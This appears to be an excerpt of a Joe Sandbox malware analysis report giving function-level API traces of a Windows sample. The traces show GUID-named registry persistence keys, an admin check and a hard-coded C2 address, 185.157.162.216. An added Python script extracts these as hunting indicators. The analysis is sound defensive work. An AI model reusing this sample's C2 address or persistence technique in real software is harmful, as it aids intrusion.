• Instruction Fuzzy Hash: 8D319175110201DBD33F9BA8ED8DB9637BEB748316F519618E12A562F0CB78A8C9CF40
APIs
• _memset.LIBCMT ref: 0030B5C0
• _memset.LIBCMT ref: 0030B5DF
  • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
  • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
  • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
  • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
  • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
  • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
  • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
• __snwprintf.LIBCMT ref: 0030B626
• __snwprintf.LIBCMT ref: 0030B64B
• DeleteFileW.KERNEL32(?), ref: 0030B65A
• RemoveDirectoryW.KERNEL32(00000000), ref: 0030B66C
• LocalFree.KERNEL32(00000000), ref: 0030B67E
• LocalFree.KERNEL32(00000000), ref: 0030B692
• GetFileAttributesW.KERNEL32(?), ref: 0030B69F
• GetFileAttributesW.KERNEL32(?), ref: 0030B6B5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFreeLocal__snwprintflstrlen$Attributes_memset$AllocDeleteDirectoryFolderKnownPathRemoveTask
                                                                                                            • String ID: %s%s$WindowsSystem.exe
                                                                                                            • API String ID: 4117469550-4151400913
                                                                                                            • Opcode ID: f23083e523e0de197ecf82b5c846d908ed2490bf7f628f9db3abcccb4728a781
                                                                                                            • Instruction ID: 03a850d9a55a8ecd99b88abcc94f17546548cf77d2431540b1bad95ab2d2f9df
                                                                                                            • Opcode Fuzzy Hash: f23083e523e0de197ecf82b5c846d908ed2490bf7f628f9db3abcccb4728a781
                                                                                                            • Instruction Fuzzy Hash: C2219371A5021C9BC771D764DC8DBE9B339AF54300F500A98F619961D1EB759EC48BA0
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00309FF4
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0030A00A
                                                                                                              • Part of subcall function 0031C570: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0031430B,?,00000000), ref: 0031C58C
                                                                                                              • Part of subcall function 0031C570: GetFileSize.KERNEL32(000000FF,00000000,?,0031430B,?), ref: 0031C5A1
                                                                                                              • Part of subcall function 0031C570: LocalAlloc.KERNELBASE(00000040,000000FF,?,0031430B), ref: 0031C5B6
                                                                                                              • Part of subcall function 0031C570: ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 0031C5D7
                                                                                                              • Part of subcall function 0031C570: CloseHandle.KERNEL32(000000FF), ref: 0031C5ED
                                                                                                            • __snwprintf.LIBCMT ref: 0030A057
                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 0030A072
                                                                                                            • RegSetValueExW.ADVAPI32(?,{2DD5D29F-1CE3-49E7-8572-9D856412ED59},00000000,00000003,00000000,00000000), ref: 0030A09A
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0030A0AB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A0B8
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0030A0CC
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A0D9
                                                                                                            Strings
                                                                                                            • {2DD5D29F-1CE3-49E7-8572-9D856412ED59}, xrefs: 0030A08E
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 0030A041
                                                                                                            • SOFTWARE\%s, xrefs: 0030A046
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseLocal$Free$AllocCreateHandleModuleNameOpenReadSizeValue__snwprintf_memset
                                                                                                            • String ID: SOFTWARE\%s${2DD5D29F-1CE3-49E7-8572-9D856412ED59}${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}
                                                                                                            • API String ID: 3609211549-3847718966
                                                                                                            • Opcode ID: f02179264a33ae954d62661767ab1726722859dceddd87e85a81a81736374586
                                                                                                            • Instruction ID: 1795b69e0f3b61aaebe714595d761a3109c468b4ce2e6e416809d65ca6dbb649
                                                                                                            • Opcode Fuzzy Hash: f02179264a33ae954d62661767ab1726722859dceddd87e85a81a81736374586
                                                                                                            • Instruction Fuzzy Hash: 172191B5A40318ABD731DB60DC4DBEA7778AF44700F1086C8A61DA6181EB759EC4CFA1
                                                                                                            APIs
                                                                                                            • lstrcpyA.KERNEL32(0037D4C0,185.157.162.216), ref: 00321EF4
                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00321F36
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00321F47
                                                                                                            • lstrcpyA.KERNEL32(?,0037D2C8), ref: 00321F94
                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 00321FA9
                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 00321F5B
                                                                                                              • Part of subcall function 00322030: lstrlenW.KERNEL32(?), ref: 00322049
                                                                                                              • Part of subcall function 00322030: setsockopt.WS2_32(00000000,0000FFFF,00000080,?,00000004), ref: 003220F0
                                                                                                            • lstrcpyA.KERNEL32(0037D4C0,?), ref: 00321FEF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpy$MutexReleaseWait$MultipleObjectObjectsSinglelstrlensetsockopt
                                                                                                            • String ID: 185.157.162.216$456
                                                                                                            • API String ID: 864648930-2825569901
                                                                                                            • Opcode ID: 7cfab7fa39dc7819e862e6251cedd44476b5fff2a9616584687df5d898745e68
                                                                                                            • Instruction ID: 09f1d7a50d31651a7475802a2d02e1b9bfca19ef8b52222196ab98b9d0e9f5a4
                                                                                                            • Opcode Fuzzy Hash: 7cfab7fa39dc7819e862e6251cedd44476b5fff2a9616584687df5d898745e68
                                                                                                            • Instruction Fuzzy Hash: 5A416270A40214FFD73BDBA4ED89FAA77B8BF08701F108209E519A72A0D775A984CB51
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030A560
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 0030A57C
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030A591
                                                                                                              • Part of subcall function 003179F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,003168E6,003347E8), ref: 00317A19
                                                                                                            • __snwprintf.LIBCMT ref: 0030A5DD
                                                                                                            • _memset.LIBCMT ref: 0030A5F0
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0030A637
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A646
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A650
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A661
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030A66B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$CreateDirectoryProcessSystem__snwprintf_memsetlstrlen
                                                                                                            • String ID: D
                                                                                                            • API String ID: 2329958830-2746444292
                                                                                                            • Opcode ID: a610079094f1f3c0259db5fef600a96893261d76de5673a70986022be0616a5d
                                                                                                            • Instruction ID: 050427e8486c59ee08d10ebc1427bec5b39a3a0642e1235235c0c4c0c041c586
                                                                                                            • Opcode Fuzzy Hash: a610079094f1f3c0259db5fef600a96893261d76de5673a70986022be0616a5d
                                                                                                            • Instruction Fuzzy Hash: DD3164B5A50208FBDB21DBA4DC89FED7B78AF48700F104598F609AB1D0DA755AC4CB51
                                                                                                            APIs
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B,00316B10,00000000), ref: 003081EB
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B), ref: 00308205
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308235
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308251
                                                                                                              • Part of subcall function 003081C0: LocalFree.KERNEL32(00000000), ref: 00308A43
                                                                                                              • Part of subcall function 00301C60: _wcsrchr.LIBCMT ref: 00301C6C
                                                                                                            • _memset.LIBCMT ref: 003096E5
                                                                                                            • __snwprintf.LIBCMT ref: 00309703
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F013F,?), ref: 00309722
                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 0030974B
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00309759
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00309763
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030976D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030977E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00309788
                                                                                                            Strings
                                                                                                            • SOFTWARE\%s, xrefs: 003096F2
                                                                                                            • {D961EA11-3F69-43D1-8581-E526BBBDC738}, xrefs: 003096ED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Allocwnsprintf$CloseOpenQueryValue__snwprintf_memset_wcsrchr
                                                                                                            • String ID: SOFTWARE\%s${D961EA11-3F69-43D1-8581-E526BBBDC738}
                                                                                                            • API String ID: 1140279918-2066183920
                                                                                                            • Opcode ID: abafae7090abaa874752fb81d2652bf069c226358e0ccd6ba3e1603e3899f01d
                                                                                                            • Instruction ID: fd62182d13b8feaf8d8082c3b02a29dec917cf13bb4c9529bc49393b32bc753e
                                                                                                            • Opcode Fuzzy Hash: abafae7090abaa874752fb81d2652bf069c226358e0ccd6ba3e1603e3899f01d
                                                                                                            • Instruction Fuzzy Hash: 0D314375A10208BBDB25DFA4DC59FEEB778EF48700F104599F609AB180D6759B84CF50
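Three of the function listings above carry host and network indicators that are worth pulling out of the raw API/strings dump rather than reading by eye. The function at 0030A0xx formats "SOFTWARE\%s" with the literal {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, opens that key under HKEY_CURRENT_USER (the 80000001 handle passed to RegOpenKeyW) and calls RegSetValueExW with value name {2DD5D29F-1CE3-49E7-8572-9D856412ED59} and dwType 3, i.e. REG_BINARY; the preceding GetModuleFileNameW and the file-reading subcall suggest the blob is the sample's own image, but the listing does not show the buffer, so treat that as an inference. The function at 003096xx reads back the default value of HKCU\SOFTWARE\{D961EA11-3F69-43D1-8581-E526BBBDC738} (a NULL lpValueName in RegQueryValueExW), and the function at 00321Exx copies the literal 185.157.162.216, the address Joe Sandbox already flags as C2. The GUID-named keys are the quickest on-host check for this build, with the caveat that the GUIDs may differ between builds of the same family.

The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's own "APIs"/"Strings" bullet format, decodes the Win32 hive-handle and REG_* constants, rebuilds the formatted key path and lists hard-coded IPv4 literals. The three excerpts are copied from the listings on this page and embedded as constructed test input; the rule that the "%s" argument is the GUID string referenced just before the format string is a heuristic based on cdecl push order, not something the report states.

```python
"""Turn Joe Sandbox "APIs"/"Strings" listings into hunt-ready indicators (added example)."""
import re
from dataclasses import dataclass

# Win32 predefined HKEY handles and REG_* value types, as they appear as raw hex arguments.
HIVES = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}

# "APIs" bullet: [Part of subcall function X:] Name.MODULE[(args)], ref: addr
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
# "Strings" bullet: literal, xrefs: addr
STR_RE = re.compile(r"^\s*•\s*(.+?),\s*xrefs:\s*([0-9A-Fa-f]+)\s*$")
GUID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")

# Constructed input: excerpts copied from the function listings on this page.
EXCERPT_WRITE = """
APIs
• __snwprintf.LIBCMT ref: 0030A057
• RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 0030A072
• RegSetValueExW.ADVAPI32(?,{2DD5D29F-1CE3-49E7-8572-9D856412ED59},00000000,00000003,00000000,00000000), ref: 0030A09A
Strings
• {2DD5D29F-1CE3-49E7-8572-9D856412ED59}, xrefs: 0030A08E
• {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 0030A041
• SOFTWARE\\%s, xrefs: 0030A046
Memory Dump Source
"""
EXCERPT_READ = """
APIs
• RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F013F,?), ref: 00309722
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 0030974B
Strings
• SOFTWARE\\%s, xrefs: 003096F2
• {D961EA11-3F69-43D1-8581-E526BBBDC738}, xrefs: 003096ED
Memory Dump Source
"""
EXCERPT_C2 = """
APIs
• lstrcpyA.KERNEL32(0037D4C0,185.157.162.216), ref: 00321EF4
  • Part of subcall function 00322030: setsockopt.WS2_32(00000000,0000FFFF,00000080,?,00000004), ref: 003220F0
Strings
Memory Dump Source
"""


@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: int


def parse_listing(text):
    """Split one function's listing into API calls and referenced strings."""
    calls, strings, section = [], [], None
    for line in text.splitlines():
        head = line.strip()
        if head in ("APIs", "Strings"):
            section = head
            continue
        if head.startswith("Memory Dump Source"):
            section = None
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            args = m.group(3).split(",") if m.group(3) is not None else []
            calls.append(Call(m.group(1), m.group(2), args, int(m.group(4), 16)))
            continue
        m = STR_RE.match(line) if section == "Strings" else None
        if m:
            strings.append((m.group(1), int(m.group(2), 16)))
    return calls, strings


def _hex(arg):
    """Hex argument -> int, or None for '?' and other non-numeric renderings."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None


def registry_indicator(calls, strings):
    """Rebuild the registry path a Reg* sequence touches, or None if the function has none.

    Heuristic: cdecl pushes the "%s" argument just before the format string, so the GUID
    literal whose xref is closest below the format string's xref is taken as the subkey.
    """
    fmt = next(((s, x) for s, x in strings if "%s" in s), None)
    if fmt is None:
        return None
    below = sorted((x, s) for s, x in strings if GUID_RE.match(s) and x < fmt[1])
    subkey = fmt[0].replace("%s", below[-1][1]) if below else fmt[0]
    ind = {"key": subkey, "op": None, "value": None, "type": None}
    for c in calls:
        if c.name.startswith("RegOpenKey") and c.args:        # first arg is the hive handle
            ind["key"] = f"{HIVES.get(_hex(c.args[0]), '?')}\\{subkey}"
        elif c.name.startswith("RegSetValueEx"):             # hKey, lpValueName, Reserved, dwType
            ind.update(op="write", value=c.args[1], type=REG_TYPES.get(_hex(c.args[3]), c.args[3]))
        elif c.name.startswith("RegQueryValueEx"):           # hKey, lpValueName (NULL = default)
            ind.update(op="read", value="(Default)" if _hex(c.args[1]) == 0 else c.args[1])
    return ind


def network_indicators(calls):
    """Dotted-quad literals passed as call arguments are hard-coded C2 candidates."""
    return sorted({a for c in calls for a in c.args if IPV4_RE.match(a)})


if __name__ == "__main__":
    for excerpt in (EXCERPT_WRITE, EXCERPT_READ, EXCERPT_C2):
        calls, strings = parse_listing(excerpt)
        print(registry_indicator(calls, strings), network_indicators(calls))
```

Run against the excerpts it prints the HKCU\SOFTWARE\{GUID} write and read paths and the C2 address; on a live host those two key paths can be checked directly, and the REG_BINARY value under the first one is what to pull for comparison against the sample's SHA256.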
APIs
• LocalAlloc.KERNEL32(00000040,00000280), ref: 00322700
• lstrcpyW.KERNEL32(0000001C,CPU001), ref: 00322735
  • Part of subcall function 0031C3A0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0031C3DB
  • Part of subcall function 0031C3A0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0031C3F4
  • Part of subcall function 0031C3A0: FreeSid.ADVAPI32(?), ref: 0031C409
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00322754
• LocalFree.KERNEL32(00000020), ref: 00322762
• LocalFree.KERNEL32(00000020), ref: 00322796
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: FreeLocal$AllocAllocateCheckFileInitializeMembershipModuleNameTokenlstrcpy
• String ID: %s [%d]$CPU001
• API String ID: 2255487582-1715046084
• Opcode ID: a2b5656e9dc3ea14e8dc4765eb2aabee7b7788d61ee720956354e8cf4792936c
• Instruction ID: bc0689fe6e4e356e17178ede15e344a5b664eca42f0122e33a2d216ed72ee6f1
• Opcode Fuzzy Hash: a2b5656e9dc3ea14e8dc4765eb2aabee7b7788d61ee720956354e8cf4792936c
• Instruction Fuzzy Hash: B1314FB4D00218BFD725DBA4EC8DBEEB7B4EF48304F5085A8E50AAA251D7749A84CF50
APIs
• CoInitialize.OLE32(00000000), ref: 00322466
• CoCreateGuid.COMBASE(c 2), ref: 00322478
• StringFromGUID2.COMBASE(c 2,?,00000027), ref: 00322490
• wsprintfA.USER32 ref: 003224AB
• LocalAlloc.KERNEL32(00000040,00000068), ref: 003224B8
• und_memcpy.LIBCMTD ref: 00322505
• LocalFree.KERNEL32(00000000), ref: 00322511
• CoUninitialize.COMBASE ref: 00322517
• CoUninitialize.COMBASE ref: 00322524
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: LocalUninitialize$AllocCreateFreeFromGuidInitializeStringund_memcpywsprintf
• String ID: c 2$c 2
• API String ID: 3539965953-3287113700
• Opcode ID: a97fa9efdd2b813f0f6b2d4e0b629bae99d42f2e9246c03cd28b71e97daf9948
• Instruction ID: 10e2ca0d367f19a0ac604d7d5f4708030127c485ef9478e926cc77435b56a637
• Opcode Fuzzy Hash: a97fa9efdd2b813f0f6b2d4e0b629bae99d42f2e9246c03cd28b71e97daf9948
• Instruction Fuzzy Hash: 8A21C8B5A00304ABDB16DFA4EC49F9F77BDAF48305F004528F90D9B281E631E944CB51
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 0031ACE8
• _memset.LIBCMT ref: 0031ACFB
• RegisterClassW.USER32(?), ref: 0031AD1E
• GetLastError.KERNEL32 ref: 0031AD30
• CreateWindowExW.USER32(00000000,{3423A12F-92CE-4AE6-962F-DE5D526886C1},0033705C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0031AD64
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0031AD87
• TranslateMessage.USER32(?), ref: 0031AD95
• DispatchMessageW.USER32(?), ref: 0031AD9F
• DestroyWindow.USER32(00000000), ref: 0031ADAD
• UnregisterClassW.USER32({3423A12F-92CE-4AE6-962F-DE5D526886C1},00000000), ref: 0031ADC5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister_memset
• String ID: {3423A12F-92CE-4AE6-962F-DE5D526886C1}
• API String ID: 1736019982-437755030
• Opcode ID: cfa440d83c0b1583b9d4eea2ac099247b56dd65c89977a255be5e699cef7d1ec
• Instruction ID: e41b2aeaa59aae9e4b934ee85b5784ad192c5658b6fd2ba65ac8e3b98886c8ff
• Opcode Fuzzy Hash: cfa440d83c0b1583b9d4eea2ac099247b56dd65c89977a255be5e699cef7d1ec
• Instruction Fuzzy Hash: 21218070941604EBD72A9FA0ED99BDE7BBCAB08702F008418E605A61E1EBB49985DF51
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 003176F8
• _memset.LIBCMT ref: 0031770B
• RegisterClassW.USER32(?), ref: 0031772E
• GetLastError.KERNEL32 ref: 00317740
• CreateWindowExW.USER32(00000000,{9C8B46D6-3D59-421D-A2D1-8F95C9197AC8},003349E4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00317774
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00317797
• TranslateMessage.USER32(?), ref: 003177A5
• DispatchMessageW.USER32(?), ref: 003177AF
• DestroyWindow.USER32(00000000), ref: 003177BD
• UnregisterClassW.USER32({9C8B46D6-3D59-421D-A2D1-8F95C9197AC8},00000000), ref: 003177D5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
